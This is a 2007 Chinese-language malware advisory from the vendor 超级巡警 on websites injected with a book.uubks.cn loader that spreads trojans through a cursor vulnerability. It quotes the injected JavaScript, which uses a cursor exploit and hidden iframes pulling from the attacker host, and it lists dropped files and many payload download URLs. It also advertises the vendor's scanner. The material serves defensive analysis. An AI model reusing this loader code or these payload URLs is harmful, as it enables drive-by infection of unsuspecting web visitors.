book.uubks.cn网站链接恶意程序分析

出处:超级巡警 时间:2007年10月31日

    
    近日,超级巡警网络安全监控团队发现,部份网站和许多用户的网页文件被注入book.uubks.cn的网站链接程序运行之后,自动下载其他恶意程序,并且利用光标漏洞广泛传播。 用户如果访问嵌入此恶意程序代码的网站,会受到病毒威胁, 用户私人敏感信息的安全将无法保证。根据此情况,超级巡警团队经过测试,提供出针对此恶意程序的分析及解决方案,并提醒广大互联网用户注意上网安全。
一、病毒相关分析:
 

    病毒行为:
        1、通过调用http://book.uubks.cn/bu/img.js下载其他恶意程序,其内容如下:
           document.writeln("<DIV style='CURSOR: url(http://book.uubks.cn/bu/ah.c)'></DIV>");
           document.writeln("<iframe width='0' height='0' src='http://book.uubks.cn/bu/img.htm'></iframe>");
           document.writeln("<iframe width='0' height='0' src='http://book.uubks.cn/bu/img1.htm'></iframe>");
           其中ah.c为利用光标漏洞传播的恶意程序
           下载http://book.uubks.cn/bu/vip.exe           23,130 字节
           %CommonProgramFiles%\Microsoft Shared\MSInfo\System36.jup
           %CommonProgramFiles%\Microsoft Shared\MSInfo\System6.ins
           System6.ins插入进程explorer.exe
           下载http://just.yule2007.com/ho123.txt并按照ho123.txt的内容下载其他程序
           //部份程序地址已经失效,或是作为预留的地址
           http://just.yule2007.com/mh.exe
           http://just.yule2007.com/wow.exe
           http://just.yule2007.com/jh.exe
           http://just.yule2007.com/qst.exe
           http://just.yule2007.com/qj.exe
           http://just.yule2007.com/my.exe
           http://just.yule2007.com/zx.exe
           http://just.yule2007.com/wd.exe
           http://just.yule2007.com/wl.exe
           http://just.yule2007.com/dh.exe
           http://just.yule2007.com/tl.exe
           http://just.yule2007.com/zt.exe
           http://just.yule2007.com/hx.exe
           http://just.yule2007.com/qqhx.exe
           http://just.yule2007.com/mir.exe
           http://just.yule2007.com/wmgj.exe
           http://just.yule2007.com/hx.exe
           http://just.yule2007.com/fy.exe
           http://just.yule2007.com/sh.exe
           http://just.yule2007.com/cs.exe
           http://just.yule2007.com/tm1.exe
           http://just.yule2007.com/tm2.exe
           http://just.yule2007.com/tm3.exe
           http://just.yule2007.com/tm4.exe
           http://just.yule2007.com/tm5.exe
           http://just.yule2007.com/guo.exe
           http://just.yule2007.com/fyun.exe

        2、img.htm和img1.htm为用US-ASCII加密的网页,img1.htm解密后如下图:
    
            通过下载http://book.uubks.cn/bu/svcos.cab           21,065 字节
            加载为系统插件功能与vip.exe相同
        3、img.htm解密后为:
     
     
            下载http://book.uubks.cn/bu/svcos.exe            23,130 字节  //与svcos.cab中文件相同
二、解决方案
    推荐方案:
           由于木马数量很多,手动查杀会很麻烦。
           所以推荐安装超级巡警进行全面病毒查杀。超级巡警用户请升级到最新病毒库,并进行全盘扫描。
           超级巡警下载地址:http://www.dswlab.com/d1.html
三、安全建议

       1、立即安装或更新防病毒软件并对内存和硬盘全面扫描(推荐安装超级巡警)。
       2、根据实际安全级别需要适当考虑选用防火墙,并进行正确的设置。
       3、使用超级巡警的补丁检查功能,及时安装系统补丁。
       4、及时更新常用软件,尤其是聊天工具。
       5、不要随意下载不安全网站的文件并运行。
       6、不要随便登陆不明网站,特别不要随意登陆需要自己银行帐号或手机及计算机系统帐号的不明网站。建议使用超
         级巡警屏蔽恶意网站。
       7、下载和新拷贝的文件要首先进行查毒。
       8、使用移动存储介质进行数据访问时,先对其进行病毒检查,建议使用超级巡警U盘免疫器进行免疫。
       9、做好系统和重要数据的备份,以便能够进行系统和数据灾难恢复。

 

注: %System% 是一个可变路径,在windows95/98/me中该变量是指%Windir%\System,在WindowsNT/2000/XP/2003/VISTA中该变
   量指%Windir%\System32。其它:
       %SystemDrive%           系统安装的磁盘分区
       %SystemRoot% = %Windir%   WINDODWS系统目录
       %ProgramFiles%        应用程序默认安装目录
       %AppData%               应用程序数据目录
       %CommonProgramFiles%      公用文件目录
       %HomePath%              当前活动用户目录
       %Temp% =%Tmp%           当前活动用户临时目录
       %DriveLetter%           逻辑驱动器分区
       %HomeDrive%            当前用户系统所在分区

 

    超级巡警:彻底查杀各种木马,全面保护系统安全。
    更多免费工具下载:http://www.dswlab.com
    专业的桌面与内容安全产品:http://www.unnoo.com

Copyright(c) DSW Lab All rights reserved